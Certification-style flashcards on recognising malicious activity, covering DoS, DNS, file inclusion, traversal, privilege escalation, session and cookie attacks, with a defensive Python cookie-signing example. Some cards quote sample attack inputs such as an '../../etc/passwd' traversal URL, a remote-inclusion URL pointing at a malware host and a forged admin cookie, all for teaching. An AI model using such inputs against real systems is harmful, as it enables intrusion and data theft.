Malicious Activity Flashcards
2.4: Given a scenario, you must be able to analyze indicators of malicious activity
What is the primary goal of a Denial of Service (DoS) attack?
A) To steal sensitive information from a target
B) To make a computer or server’s resources unavailable
C) To gain administrative access to a system
D) To inject malicious code into an application
Answer:
✅ B) To make a computer or server’s resources unavailable
Explanation:
A DoS attack aims to overwhelm a target system so that it cannot respond to legitimate requests. Unlike hacking or data theft, a DoS attack does not attempt to steal information (A) or gain administrative control (C). It also does not involve injecting malicious code (D), which is a characteristic of malware or ransomware attacks.
Which type of flood attack attempts to overload a server with ICMP echo requests?
A) SYN Flood
B) Ping Flood
C) DNS Amplification Attack
D) Fork Bomb
Answer:
✅ B) Ping Flood
Explanation:
A Ping Flood attack sends excessive ICMP Echo Request (ping) packets to a target system, attempting to overwhelm it.
(A) SYN Flood attacks focus on TCP connections.
(C) DNS Amplification exploits large DNS responses.
(D) Fork Bombs create excessive system processes rather than sending network traffic.
What is the primary difference between a DoS and a DDoS attack?
A) A DoS attack targets multiple systems, while a DDoS attack targets one system.
B) A DoS attack involves malware, while a DDoS attack does not.
C) A DDoS attack uses multiple machines to overwhelm a target, while a DoS attack typically uses a single machine.
D) A DDoS attack only occurs on DNS servers, while a DoS attack affects any server.
Answer:
✅ C) A DDoS attack uses multiple machines to overwhelm a target, while a DoS attack typically uses a single machine.
Explanation:
A DoS attack is launched from one machine to exhaust a server’s resources.
A DDoS attack uses a botnet of multiple machines to attack simultaneously.
(A) is incorrect because both DoS and DDoS target single systems.
(B) is incorrect because neither attack requires malware.
(D) is incorrect since DDoS can affect any server, not just DNS.
What technique do attackers use to cause a DNS Amplification attack?
A) Sending multiple ping requests to a DNS server
B) Spoofing the victim’s IP and sending small DNS requests that generate large responses
C) Opening multiple TCP connections but never completing the handshake
D) Overloading a server with a rapid power cycling attack
Answer:
✅ B) Spoofing the victim’s IP and sending small DNS requests that generate large responses
Explanation:
DNS Amplification spoofs the victim’s IP address and sends small DNS queries that generate large responses, overwhelming the victim’s network.
(A) describes a Ping Flood.
(C) describes a SYN Flood.
(D) is a PDoS attack method.
What is the main function of a flood guard?
A) To block excessive SYN packets before they overwhelm a server
B) To prevent malware from infecting a network
C) To route all malicious traffic to a non-existent server
D) To remove botnets from a network
Answer:
✅ A) To block excessive SYN packets before they overwhelm a server
Explanation:
Flood guards detect and block SYN floods, which attempt to exhaust server resources by leaving TCP connections half-open.
(B) is incorrect because flood guards are not antivirus tools.
(C) describes blackholing or sinkholing.
(D) is incorrect because removing botnets requires specialized malware removal.
What is the purpose of a Permanent Denial of Service (PDoS) attack?
A) To temporarily disable a server by overloading it with traffic
B) To exploit a security flaw and permanently damage a device, such as reflashing firmware
C) To take control of a system and steal sensitive data
D) To send large volumes of spam email to a network
Answer:
✅ B) To exploit a security flaw and permanently damage a device, such as reflashing firmware
Explanation:
A PDoS attack (“bricking” a device) permanently damages hardware by installing malicious firmware or overloading the device.
(A) describes a DoS/DDoS attack.
(C) is hacking, not DoS.
(D) describes a spam or phishing attack.
How does a Fork Bomb attack a system?
A) By overloading a network device with malicious firmware
B) By creating an excessive number of processes, exhausting system resources
C) By opening multiple TCP connections but never completing them
D) By sending a flood of DNS requests to a victim
Answer:
✅ B) By creating an excessive number of processes, exhausting system resources
Explanation:
A Fork Bomb continuously creates processes, consuming all available CPU/memory.
(A) describes PDoS.
(C) describes a SYN Flood.
(D) describes DNS Amplification.
What is a limitation of blackholing as a DDoS mitigation technique?
A) It permanently removes attackers from the network
B) Attackers can change IP addresses and continue the attack
C) It is an expensive solution that only large organizations can afford
D) It requires specialized cloud services like Akamai or Cloudflare
Answer:
✅ B) Attackers can change IP addresses and continue the attack
Explanation:
Blackholing routes malicious traffic to a null interface, stopping attacks temporarily. However, attackers can change their IP addresses and resume the attack.
(A) is incorrect because blackholing is temporary.
(C) & (D) are incorrect because blackholing is a simple routing method that does not require expensive services.
Which is NOT a DDoS mitigation strategy?
A) Using an Intrusion Prevention System (IPS)
B) Implementing a flood guard
C) Using a botnet to attack attackers
D) Scaling cloud infrastructure
Answer:
✅ C) Using a botnet to attack attackers
Explanation:
Using a botnet to attack attackers is illegal and is itself an offensive attack, not a mitigation.
(A, B, and D) are all valid DDoS mitigation strategies.
Why does DNS typically use UDP instead of TCP?
A) UDP is faster and requires no connection establishment
B) TCP is unreliable for DNS requests
C) DNS does not need to transfer large amounts of data
D) UDP ensures stronger security than TCP
Answer:
✅ A) UDP is faster and requires no connection establishment
Explanation:
DNS primarily uses UDP because it is fast and doesn’t require a three-way handshake like TCP.
(B, C, and D) are incorrect: TCP is not unreliable and is still used for large DNS queries and responses, and UDP offers no security advantage over TCP.
Scenario:
A financial institution receives reports from customers who claim that when they try to visit their online banking portal, they are redirected to a fake website that looks identical to the real one. The bank’s IT security team investigates and finds that attackers have altered the DNS cache of certain DNS resolvers, causing legitimate customers to be redirected to a malicious IP address.
What type of attack is this?
A) DNS Amplification
B) DNS Cache Poisoning
C) DNS Tunneling
D) DNS Zone Transfer Attack
✅ Correct Answer: B) DNS Cache Poisoning
Explanation:
This attack involves corrupting the DNS resolver’s cache with false information to redirect users to a fake website.
(A) DNS Amplification is incorrect because that attack involves flooding a target with excessive DNS traffic, not redirection.
(C) DNS Tunneling is incorrect because tunneling is used for data exfiltration and bypassing firewalls, not DNS cache manipulation.
(D) DNS Zone Transfer Attack is incorrect because that attack is used for reconnaissance, not redirecting users.
How can the organization prevent this attack?
A) Enable DNSSEC (Domain Name System Security Extensions)
B) Disable all external DNS queries
C) Block all DNS traffic on the firewall
D) Allow only large DNS responses
✅ Correct Answer: A) Enable DNSSEC (Domain Name System Security Extensions)
Explanation:
DNSSEC helps prevent DNS cache poisoning by using cryptographic signatures to verify the authenticity of DNS responses.
(B) Disabling all external DNS queries is impractical because external DNS resolution is necessary for normal internet browsing.
(C) Blocking all DNS traffic would disrupt legitimate web browsing.
(D) Allowing large DNS responses could actually make attacks worse, as attackers could exploit DNS amplification techniques.
Scenario:
An online gaming platform suddenly goes offline. Network traffic logs show that the company’s servers are being flooded with a massive amount of DNS response traffic, all coming from various DNS servers across the internet. Upon further investigation, the security team finds that attackers are sending small DNS queries with the company’s spoofed IP address, which triggers large DNS responses being sent back to their servers.
What type of attack is occurring?
A) DNS Tunneling
B) DNS Amplification Attack
C) DNS Cache Poisoning
D) Domain Hijacking
✅ Correct Answer: B) DNS Amplification Attack
Explanation:
The attacker spoofs the victim’s IP address, sending small queries to open DNS resolvers, which then respond with large traffic volumes, overwhelming the victim.
(A) DNS Tunneling is incorrect because tunneling involves data exfiltration, not high-volume response traffic.
(C) DNS Cache Poisoning is incorrect because no DNS cache is being manipulated; the victim is simply being flooded with traffic.
(D) Domain Hijacking involves stealing control of a domain name, which is not happening in this scenario.
How can organizations mitigate this type of attack?
A) Block all outgoing DNS requests
B) Use DNSSEC to sign DNS records
C) Rate-limit DNS response traffic and restrict large queries
D) Encrypt all DNS queries
✅ Correct Answer: C) Rate-limit DNS response traffic and restrict large queries
Explanation:
Rate-limiting DNS responses reduces the impact of DNS amplification attacks by limiting how frequently a DNS server can respond.
(A) Blocking all outgoing DNS requests would disrupt normal operations.
(B) DNSSEC protects against DNS spoofing, not high-volume flooding.
(D) Encrypting DNS queries (such as using DNS-over-HTTPS) does not prevent amplification, as the attack does not rely on encrypted data.
Scenario:
A company’s firewall is configured to block SSH and HTTP traffic to unauthorized external servers. However, after a security breach, forensic analysis shows that an attacker was sending data to an external server via DNS queries. The attacker used the company’s own DNS infrastructure to bypass the firewall and extract sensitive files.
What type of attack is this?
A) DNS Cache Poisoning
B) DNS Zone Transfer Attack
C) DNS Tunneling
D) DNS Amplification
✅ Correct Answer: C) DNS Tunneling
Explanation:
DNS Tunneling allows attackers to encapsulate malicious traffic inside DNS queries, which firewalls usually allow through.
(A) DNS Cache Poisoning is incorrect because there is no cache manipulation occurring.
(B) DNS Zone Transfer Attack is incorrect because no unauthorized zone transfer is being attempted.
(D) DNS Amplification is incorrect because there is no large-scale flooding of DNS responses.
How can organizations detect and prevent DNS tunneling?
A) Monitor and analyze DNS logs for unusual query patterns
B) Block all external DNS requests
C) Use DNSSEC to prevent data exfiltration
D) Disable all DNS queries on corporate networks
✅ Correct Answer: A) Monitor and analyze DNS logs for unusual query patterns
Explanation:
Unusual query patterns (such as long, encoded queries or frequent lookups for unknown domains) can indicate DNS tunneling.
(B) Blocking all external DNS requests is impractical.
(C) DNSSEC protects against spoofing, not tunneling.
(D) Disabling all DNS queries would disrupt internet access.
Scenario:
An e-commerce company suddenly loses control of its domain name. Customers attempting to visit the website are redirected to an unknown page that asks for credit card details. IT security confirms that the domain’s registration details were changed without authorization, transferring control to an unknown entity.
What type of attack is this?
A) DNS Amplification Attack
B) Domain Hijacking
C) DNS Tunneling
D) DNS Cache Poisoning
✅ Correct Answer: B) Domain Hijacking
Explanation:
Domain Hijacking occurs when an attacker gains unauthorized control over a domain registration.
(A) DNS Amplification does not involve domain registration changes.
(C) DNS Tunneling is incorrect because no data exfiltration is happening.
(D) DNS Cache Poisoning affects DNS resolvers, not domain registration records.
How can companies prevent domain hijacking?
A) Use multi-factor authentication and registry lock on domain registration accounts
B) Encrypt all DNS requests to prevent hijacking
C) Disable all DNS queries to the affected domain
D) Enable DNSSEC to prevent unauthorized domain transfers
✅ Correct Answer: A) Use multi-factor authentication and registry lock on domain registration accounts
Explanation:
Registry locks prevent unauthorized domain name transfers.
(B) Encrypting DNS requests does not protect domain registration.
(C) Disabling DNS queries would only make the site inaccessible.
(D) DNSSEC does not protect against unauthorized domain transfers.
A web developer at a financial institution is reviewing security logs and notices suspicious requests coming from an external IP. The logs show repeated attempts using URLs such as:
https://securebank.com/account-details?file=../../etc/passwd
The attacker appears to be trying to access system files outside the web document root directory.
What type of attack is the attacker attempting?
A) SQL Injection
B) Directory Traversal Attack
C) Cross-Site Scripting (XSS)
D) Remote File Inclusion (RFI)
✅ Correct Answer: B) Directory Traversal Attack
Explanation:
The attacker is using ../../etc/passwd to navigate outside the web root directory and access system files.
(A) SQL Injection involves injecting SQL code, which is not present in this scenario.
(C) XSS involves injecting JavaScript or HTML to execute in a user’s browser, which is not happening here.
(D) Remote File Inclusion (RFI) involves loading a file from a remote server, which is not the case here.
How can the web server be secured against this attack?
A) Use input validation to block ../ sequences
B) Allow only trusted IP addresses to access system files
C) Encrypt all files on the web server
D) Set file permissions to read-only for all users
✅ Correct Answer: A) Use input validation to block ../ sequences
Explanation:
Input validation prevents users from entering malicious file paths.
(B) Allowing trusted IPs does not address the vulnerability, as the attack exploits a code flaw.
(C) Encrypting files does not stop unauthorized access via directory traversal.
(D) Read-only file permissions do not prevent traversal; they only restrict modifications.
Scenario:
A company’s customer login portal is compromised when attackers exploit a vulnerability in the system. The attackers inject a remote malicious script using the following URL:
https://example.com/login.php?user=http://malware.site/malicious.php
The malicious.php script is executed on the company’s server, allowing the attacker to gain control.
What type of attack is this?
A) Remote File Inclusion (RFI)
B) Local File Inclusion (LFI)
C) SQL Injection
D) Directory Traversal
✅ Correct Answer: A) Remote File Inclusion (RFI)
Explanation:
The attacker injects a remote script (http://malware.site/malicious.php) into the application.
(B) LFI would involve executing existing local files rather than loading one from a remote server.
(C) SQL Injection manipulates databases, which is not happening here.
(D) Directory Traversal tries to access restricted local system files, not execute remote files.
How can organizations prevent Remote File Inclusion attacks?
A) Disable the execution of PHP scripts from remote sources
B) Store all files on an external cloud storage
C) Use strong passwords for user authentication
D) Limit database access to administrators only
✅ Correct Answer: A) Disable the execution of PHP scripts from remote sources
Explanation:
Disabling remote file execution in the server settings prevents the system from executing malicious remote scripts.
(B) Storing files on a cloud does not address the core vulnerability in web application handling.
(C) Strong passwords protect against brute force attacks, not RFI.
(D) Limiting database access does not prevent RFI, as RFI does not involve databases.
Scenario:
A forum allows users to upload images as part of their profiles. An attacker uploads a PHP shell disguised as an image and then accesses it using a directory traversal attack:
https://forum.com/profile.php?file=../../uploads/shell.php
Now, the attacker can execute arbitrary commands on the system.
What type of attack is this?
A) SQL Injection
B) Cross-Site Request Forgery (CSRF)
C) Local File Inclusion (LFI)
D) Remote File Inclusion (RFI)
✅ Correct Answer: C) Local File Inclusion (LFI)
Explanation:
LFI allows an attacker to execute files that already exist on the local server.
(A) SQL Injection involves database manipulation, not file execution.
(B) CSRF forces users to perform unintended actions, which is unrelated.
(D) RFI requires files to be loaded from external sources, which is not the case here.
What is the best way to prevent LFI attacks?
A) Restrict file uploads to only non-executable formats (e.g., JPEG, PNG)
B) Allow users to upload files directly to the root directory
C) Use weak encryption to mask file names
D) Increase server RAM to handle large file loads
✅ Correct Answer: A) Restrict file uploads to only non-executable formats (e.g., JPEG, PNG)
Explanation:
Restricting file types prevents attackers from uploading executable scripts like PHP files.
(B) Allowing uploads to the root directory increases risk.
(C) Weak encryption does not prevent malicious execution.
(D) Increasing server RAM does not address the security vulnerability.
Scenario:
A penetration tester notices that a website’s security filters block normal directory traversal attempts using ../. However, when trying %2e%2e%2f, the server successfully processes the request and grants access to restricted files.
What technique is the attacker using?
A) SQL Injection Encoding
B) Directory Traversal Encoding
C) Command Injection
D) Remote File Execution
✅ Correct Answer: B) Directory Traversal Encoding
Explanation:
The attacker encodes ../ as %2e%2e%2f to bypass security filters.
(A) SQL Injection Encoding applies to database queries, not file path manipulation.
(C) Command Injection targets command-line execution, not file path traversal.
(D) Remote File Execution is RFI-related, not a traversal technique.
What is the best mitigation for directory traversal encoding attacks?
A) Normalize input and decode characters before processing
B) Remove all slashes (/) from URLs
C) Use CAPTCHA to verify human users
D) Allow only administrator access to system files
✅ Correct Answer: A) Normalize input and decode characters before processing
Explanation:
Decoding input before processing helps security filters detect encoded traversal attempts.
(B) Removing slashes would break URL functionality.
(C) CAPTCHA does not stop file system attacks.
(D) Restricting administrator access is good, but does not prevent traversal attempts.
Scenario:
A security analyst is investigating a breach in a corporate system. The attacker was able to run unauthorized scripts within the system after exploiting a vulnerability in an outdated web application. The attack allowed the hacker to execute commands at will, manipulating system files and stealing sensitive data.
What type of attack did the hacker perform?
A) Privilege Escalation
B) Arbitrary Code Execution (ACE)
C) Rootkit Installation
D) SQL Injection
✅ Correct Answer: B) Arbitrary Code Execution (ACE)
Explanation:
The attacker was able to run their own code on the system without restrictions, which defines Arbitrary Code Execution.
(A) Privilege Escalation occurs when attackers gain higher access, but in this case, they are running arbitrary code, not necessarily escalating privileges.
(C) Rootkit Installation may be a later step, but the main attack executed unauthorized code first.
(D) SQL Injection affects databases, but this scenario involves running system commands.
What is the best way to prevent arbitrary code execution attacks?
A) Keep software and applications updated to patch vulnerabilities
B) Allow only administrator accounts to install software
C) Disable antivirus software to reduce system slowdowns
D) Change file names frequently to confuse attackers
✅ Correct Answer: A) Keep software and applications updated to patch vulnerabilities
Explanation:
Most ACE vulnerabilities come from outdated or unpatched software.
(B) Limiting software installation helps but does not prevent execution of existing vulnerabilities.
(C) Disabling antivirus makes the system more vulnerable.
(D) Changing file names does not prevent execution of malicious code.
Scenario:
A financial services company detects that its web server was compromised. Logs reveal that an attacker sent a malicious request over the internet, exploiting a vulnerability in the server’s web application framework. The attacker successfully executed commands remotely, allowing them to modify financial records.
What type of attack did the hacker perform?
A) Remote Code Execution (RCE)
B) Horizontal Privilege Escalation
C) Phishing Attack
D) SQL Injection
✅ Correct Answer: A) Remote Code Execution (RCE)
Explanation:
The attacker sent and executed malicious code remotely, which is Remote Code Execution (RCE).
(B) Horizontal Privilege Escalation involves accessing another user’s data at the same privilege level, which is not the case here.
(C) Phishing Attack involves tricking users into revealing credentials, but this attack exploited a software vulnerability.
(D) SQL Injection targets databases, not code execution.
What is the best way to prevent Remote Code Execution attacks?
A) Disable all internet access to prevent external threats
B) Use Web Application Firewalls (WAFs) and apply security patches
C) Delete all logs to hide traces of exploitation
D) Allow users to execute any code on the server
✅ Correct Answer: B) Use Web Application Firewalls (WAFs) and apply security patches
Explanation:
WAFs help detect and block malicious requests before they reach the server.
Patching software fixes vulnerabilities that attackers exploit for RCE attacks.
(A) Disabling internet access is unrealistic for a web-based company.
(C) Deleting logs does not prevent attacks.
(D) Allowing users to execute code freely increases security risks.
Scenario:
A hacker gains access to a company’s network as a normal user. They exploit a vulnerability in a background system process, which allows them to elevate their privileges from a standard user to administrator level.
What type of attack is this?
A) Vertical Privilege Escalation
B) Horizontal Privilege Escalation
C) Rootkit Attack
D) Brute Force Attack
✅ Correct Answer: A) Vertical Privilege Escalation
Explanation:
The attacker escalates from a normal user to an administrator, which is vertical privilege escalation.
(B) Horizontal Privilege Escalation would involve accessing another user’s account at the same privilege level.
(C) Rootkit Attack is a technique to hide malware, not necessarily elevate privileges.
(D) Brute Force Attack involves guessing passwords, not escalating privileges.
What is the best way to prevent vertical privilege escalation?
A) Implement least privilege principles and use Multi-Factor Authentication (MFA)
B) Allow all users to have admin rights
C) Disable firewalls to improve system performance
D) Encrypt all files on the system
✅ Correct Answer: A) Implement least privilege principles and use Multi-Factor Authentication (MFA)
Explanation:
Least privilege access ensures that users only have the permissions they need.
MFA makes it harder for attackers to gain higher-level access.
(B) Giving admin rights to all users increases risks.
(C) Disabling firewalls makes attacks easier.
(D) Encrypting files does not prevent privilege escalation.
Scenario:
An IT administrator finds that even after removing detected malware and rebooting the system, the malware reinstalls itself automatically. After investigation, they discover that the malware was deeply embedded in system processes and could hide itself from antivirus detection.
What type of malware is causing this issue?
A) Trojan Horse
B) Rootkit
C) Keylogger
D) Worm
✅ Correct Answer: B) Rootkit
Explanation:
Rootkits are designed to hide their presence and persist even after reboots.
(A) Trojan Horses disguise themselves as legitimate software but do not usually hide deep in system processes.
(C) Keyloggers record keystrokes but do not persist deeply at the system level.
(D) Worms spread automatically, but they do not necessarily hide themselves.
What is the most dangerous type of rootkit?
A) User Mode Rootkit
B) Kernel Mode Rootkit
C) Boot Sector Virus
D) Spyware
✅ Correct Answer: B) Kernel Mode Rootkit
Explanation:
Kernel Mode Rootkits run in Ring 0, the highest privilege level, allowing them to fully control the OS.
(A) User Mode Rootkits operate at a lower privilege level and depend on system features.
(C) Boot Sector Viruses infect the boot sector, but they are not rootkits.
(D) Spyware steals information but does not hide itself like rootkits.
Scenario:
A bank customer logs into their online banking account. An attacker on the same network captures the login request containing the customer’s credentials. Later, the attacker resends (replays) the login request to the bank’s server and successfully logs in as the victim.
What type of attack has occurred?
A) Session Hijacking
B) Man-in-the-Middle Attack
C) Replay Attack
D) SQL Injection
✅ Correct Answer: C) Replay Attack
Explanation:
Replay attacks involve capturing valid authentication data and retransmitting it later.
(A) Session Hijacking modifies active sessions rather than replaying past requests.
(B) Man-in-the-Middle (MITM) Attacks intercept and alter real-time communications, but this scenario focuses on replaying old data.
(D) SQL Injection manipulates databases, which is unrelated to authentication replays.
How can the bank prevent this type of attack?
A) Encrypt login credentials but allow sessions to remain valid indefinitely
B) Implement session tokens that expire after a short period
C) Allow customers to store their credentials in plaintext for convenience
D) Use CAPTCHA during login to slow down attackers
✅ Correct Answer: B) Implement session tokens that expire after a short period
Explanation:
Session tokens prevent replay attacks by making authentication unique to each session.
(A) Keeping sessions indefinitely increases security risks.
(C) Storing credentials in plaintext makes attacks easier.
(D) CAPTCHA slows attackers but does not prevent replaying old requests.
Scenario:
A user logs into an online shopping website. An attacker captures the login credentials during the session and later replays the captured credentials to gain unauthorized access, allowing them to place fraudulent orders.
What type of attack is this?
A) Credential Replay Attack
B) Phishing Attack
C) Buffer Overflow Attack
D) Cross-Site Scripting (XSS)
✅ Correct Answer: A) Credential Replay Attack
Explanation:
The attacker captures login credentials and reuses them, making it a credential replay attack.
(B) Phishing involves tricking users into giving up credentials directly.
(C) Buffer Overflow involves sending excessive input to crash programs, which is unrelated.
(D) XSS injects malicious scripts into web pages, not replaying login data.
How can the website prevent credential replay attacks?
A) Use multi-factor authentication (MFA) requiring an extra security step
B) Allow users to save their login credentials in cookies for convenience
C) Disable HTTPS to speed up logins
D) Extend session expiration time to prevent frequent logouts
✅ Correct Answer: A) Use multi-factor authentication (MFA) requiring an extra security step
Explanation:
MFA makes it harder for attackers to replay login credentials because they lack the extra authentication factor (e.g., a one-time passcode).
(B) Saving login credentials in cookies increases risk.
(C) Disabling HTTPS makes logins less secure.
(D) Extending session expiration increases the attack window.
Scenario:
A security analyst is investigating two types of network attacks.
In one attack, the hacker modifies data in an active session.
In the second attack, the hacker captures valid login data and replays it later.
What is the difference between these two attacks?
A) The first attack is a replay attack, and the second attack is session hijacking
B) The first attack is session hijacking, and the second attack is a replay attack
C) Both attacks are the same since they involve authentication
D) Both attacks are prevented by increasing network bandwidth
✅ Correct Answer: B) The first attack is session hijacking, and the second attack is a replay attack
Explanation:
Session Hijacking occurs when the attacker modifies real-time data during an active session.
Replay Attacks involve capturing and reusing past authentication data.
(A) is incorrect because the attacks are reversed.
(C) is incorrect because they differ in execution.
(D) is incorrect because increasing bandwidth does not prevent these attacks.
Scenario:
A company uses an outdated Wi-Fi security protocol, WEP (Wired Equivalent Privacy). Security analysts discover that attackers can capture authentication packets and replay them to gain unauthorized access to the network.
What is the best security protocol to prevent this type of replay attack?
A) WEP
B) WPA2
C) WPA3
D) MAC Filtering
✅ Correct Answer: C) WPA3
Explanation:
WPA3 improves encryption and prevents replay attacks.
(A) WEP is outdated and highly vulnerable to replay attacks.
(B) WPA2 is better but still has some known weaknesses.
(D) MAC Filtering does not prevent replay attacks, as MAC addresses can be spoofed.
Scenario:
A government agency wants to protect its secure online portals from replay attacks. The cybersecurity team implements session tokens that are unique and expire after a short time.
How do session tokens prevent replay attacks?
A) They are randomly generated and difficult to predict
B) They store the user’s credentials permanently for future logins
C) They prevent the user from logging into multiple devices
D) They encrypt all traffic between the user and the server
✅ Correct Answer: A) They are randomly generated and difficult to predict
Explanation:
Session tokens are unique for each session and expire quickly, making them useless if intercepted.
(B) Permanent storage of credentials increases risk.
(C) Tokens do not prevent multiple logins but ensure each session is unique.
(D) Encryption helps, but it does not prevent replaying captured credentials.
Scenario:
A company requires employees to log in with a password and a one-time passcode (OTP) sent to their phone. Even if an attacker captures an employee’s credentials, they cannot log in without access to the OTP.
What security measure is the company using to prevent replay attacks?
A) Session Tokens
B) Multi-Factor Authentication (MFA)
C) IP Whitelisting
D) Biometric Authentication
✅ Correct Answer: B) Multi-Factor Authentication (MFA)
Explanation:
MFA adds an extra layer of security, preventing attackers from reusing stolen credentials.
(A) Session tokens prevent session hijacking but do not replace MFA.
(C) IP whitelisting helps but does not fully prevent replay attacks.
(D) Biometrics can serve as one factor in MFA, but biometric authentication alone is not what protects the company here.
Scenario:
A user logs into an online learning platform. Each time they navigate to a new page, they have to log in again, even though they already authenticated. The developer explains that this happens because HTTP is stateless and does not remember previous requests.
What does it mean that HTTP is stateless?
A) HTTP remembers user sessions until the browser is closed
B) HTTP does not retain information about previous requests
C) HTTP automatically stores all user session details on the server
D) HTTP encrypts and saves session data for future logins
✅ Correct Answer: B) HTTP does not retain information about previous requests
Explanation:
HTTP is stateless, meaning each request is independent and the server does not remember past interactions.
(A) Incorrect – HTTP does not remember sessions without cookies or tokens.
(C) Incorrect – Sessions must be managed with external storage mechanisms (cookies, sessions, or databases).
(D) Incorrect – HTTP does not encrypt or store session data by default.
Scenario:
A shopping website wants to keep users logged in even after they close their browser. The developer decides to use persistent cookies to store session information.
Which type of cookie should be used?
A) Session cookies
B) Persistent cookies
C) Temporary cookies
D) Encrypted cookies
✅ Correct Answer: B) Persistent cookies
Explanation:
Persistent cookies carry an Expires or Max-Age attribute, so the browser keeps them on disk across restarts until they expire or are deleted.
(A) Session cookies have no expiry attribute and are discarded when the browser is closed.
(C) "Temporary cookies" is not a standard term; it is a loose synonym for session cookies.
(D) Encryption protects the cookie's contents; it does not determine how long the browser keeps it.
Scenario:
A user logs into a secure banking website on public Wi-Fi. An attacker on the same network steals the session cookie using a network sniffing tool and gains access to the user’s banking session.
What type of attack is the hacker using?
A) Cookie Poisoning
B) Session Hijacking
C) Session Prediction
D) SQL Injection
✅ Correct Answer: B) Session Hijacking
Explanation:
Session hijacking occurs when an attacker steals a session token and takes over an active session.
(A) Cookie Poisoning modifies a cookie instead of stealing it.
(C) Session Prediction involves guessing session tokens, not stealing them.
(D) SQL Injection exploits databases, not session cookies.
How can the bank protect users from session hijacking?
A) Use HTTPS and secure cookies
B) Allow users to store session data in plaintext
C) Increase session timeout to several hours
D) Disable all cookies
✅ Correct Answer: A) Use HTTPS and secure cookies
Explanation:
HTTPS encrypts the whole exchange, including the Cookie header, so a sniffer on the shared Wi-Fi sees only ciphertext. Setting the Secure flag stops the browser from ever sending the cookie over plain HTTP, and HttpOnly keeps page scripts from reading it.
(B) Storing session data in plaintext increases security risks.
(C) Long session timeouts widen the window in which a stolen cookie is still valid.
(D) Disabling cookies breaks session handling rather than protecting it.
Scenario:
A website stores user roles in cookies as follows:
user=John; role=basic_user
An attacker modifies the cookie to:
user=John; role=admin
Now, they can access admin-only pages.
What type of attack is this?
A) Cookie Poisoning
B) Session Hijacking
C) Cross-Site Scripting (XSS)
D) Phishing Attack
✅ Correct Answer: A) Cookie Poisoning
Explanation:
Cookie Poisoning modifies the contents of a cookie the client already holds; here the site trusted a client-side role value, so editing it escalated privilege.
(B) Session Hijacking steals an existing valid session, while cookie poisoning modifies stored cookies.
(C) XSS injects script into a page; that script could read or rewrite cookies, but the scenario shows the attacker editing the cookie directly with no script injection.
(D) Phishing tricks users into revealing credentials but does not modify cookies.
How can websites prevent cookie poisoning?
A) Store sensitive data only on the client’s browser
B) Encrypt and sign cookies
C) Allow users to edit their own cookies
D) Use only session cookies with no expiration
✅ Correct Answer: B) Encrypt and sign cookies
Explanation:
Signing the cookie (for example with an HMAC over its contents) lets the server detect any modification and reject it; encryption hides the contents but on its own does not stop tampering, so the two are combined. Better still, keep authorization data such as the role on the server, keyed by an opaque session identifier, so there is nothing meaningful for the client to edit.
(A) Storing sensitive data on the client's browser is risky.
(C) Allowing users to edit cookies increases security risks.
(D) Session cookies do not prevent modification of stored cookies.
Scenario:
A hacker discovers that a website generates predictable session tokens like:
session=1001
session=1002
session=1003
By guessing the next session ID, the hacker gains unauthorized access.
What type of attack is this?
A) Session Hijacking
B) Session Prediction
C) Cookie Poisoning
D) DNS Spoofing
✅ Correct Answer: B) Session Prediction
Explanation:
Session Prediction happens when session tokens are weak and easily guessed.
(A) Session Hijacking requires stealing an active session, not guessing.
(C) Cookie Poisoning modifies cookies but does not predict session tokens.
(D) DNS Spoofing misdirects users to a fake website.
How can websites prevent session prediction?
A) Use strong, unpredictable session tokens
B) Store session tokens in plaintext
C) Disable authentication requirements
D) Allow users to set their own session tokens
✅ Correct Answer: A) Use strong, unpredictable session tokens
Explanation:
Tokens drawn from a cryptographically secure random generator with at least 128 bits of entropy make guessing infeasible: there is no pattern to extrapolate and the space is far too large to enumerate.
(B) Storing tokens in plaintext increases security risks.
(C) Disabling authentication removes security entirely.
(D) Allowing users to set session tokens makes them trivially predictable.
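The following Python is added here as a worked example and is not part of these flashcards. It shows the server side of both the cookie poisoning scenario and the session prediction scenario above: the role is kept in a server-side store keyed by a token from the OS CSPRNG (nothing like session=1001, 1002, 1003), and the cookie carrying that token is HMAC-signed so an edited value such as role=admin is rejected before it is ever looked up. The in-memory store, the key handling and the 15-minute lifetime are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets
import time

# Assumed server-side signing key; a real deployment loads it from a secrets store.
SERVER_KEY = secrets.token_bytes(32)

# Server-side session store: token -> session state. The role lives here, never in
# the cookie, so there is nothing authorizing in the client's hands to edit.
SESSIONS = {}


def new_session(user, role, ttl_seconds=900):
    """Issue an unpredictable token (256 bits from the OS CSPRNG) and record the
    session server-side with a short lifetime."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = {"user": user, "role": role, "expires": time.time() + ttl_seconds}
    return token


def sign_cookie(value):
    """Append an HMAC-SHA256 tag so any change to the value is detectable."""
    tag = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_cookie(cookie):
    """Return the cookie value if its tag is valid, otherwise None. compare_digest
    keeps the comparison constant-time so the tag cannot be guessed byte by byte."""
    value, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return value


def lookup_session(cookie, now=None):
    """Resolve a signed cookie to its session, or None if the cookie was tampered
    with, is unknown, or has expired (expired entries are dropped)."""
    token = verify_cookie(cookie)
    if token is None:
        return None
    session = SESSIONS.get(token)
    if session is None:
        return None
    if (now if now is not None else time.time()) > session["expires"]:
        SESSIONS.pop(token, None)
        return None
    return session


def sequential_tokens_are_predictable(ids):
    """The flaw from the session prediction scenario: if consecutive tokens differ
    by a constant, the next one can be computed. True for 1001, 1002, 1003."""
    diffs = {b - a for a, b in zip(ids, ids[1:])}
    return len(ids) > 1 and len(diffs) == 1


if __name__ == "__main__":
    cookie = sign_cookie(new_session("John", "basic_user"))
    print("valid cookie ->", lookup_session(cookie)["role"])
    forged = cookie[:-1] + ("0" if cookie[-1] != "0" else "1")
    print("forged cookie ->", lookup_session(forged))
```

Because the cookie only ever carries an opaque token, a user who rewrites it gains nothing: a changed token fails the HMAC check, and even a valid-looking token that was never issued has no entry in the store.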
Scenario:
A hacker gains access to a corporate Wi-Fi network and manipulates ARP tables to position themselves between employees’ devices and the network gateway. This allows them to capture login credentials sent over HTTP.
What type of attack is the hacker performing?
A) Rogue Access Point Attack
B) ARP Poisoning (On-Path Attack)
C) DNS Spoofing
D) Denial of Service (DoS) Attack
✅ Correct Answer: B) ARP Poisoning (On-Path Attack)
Explanation:
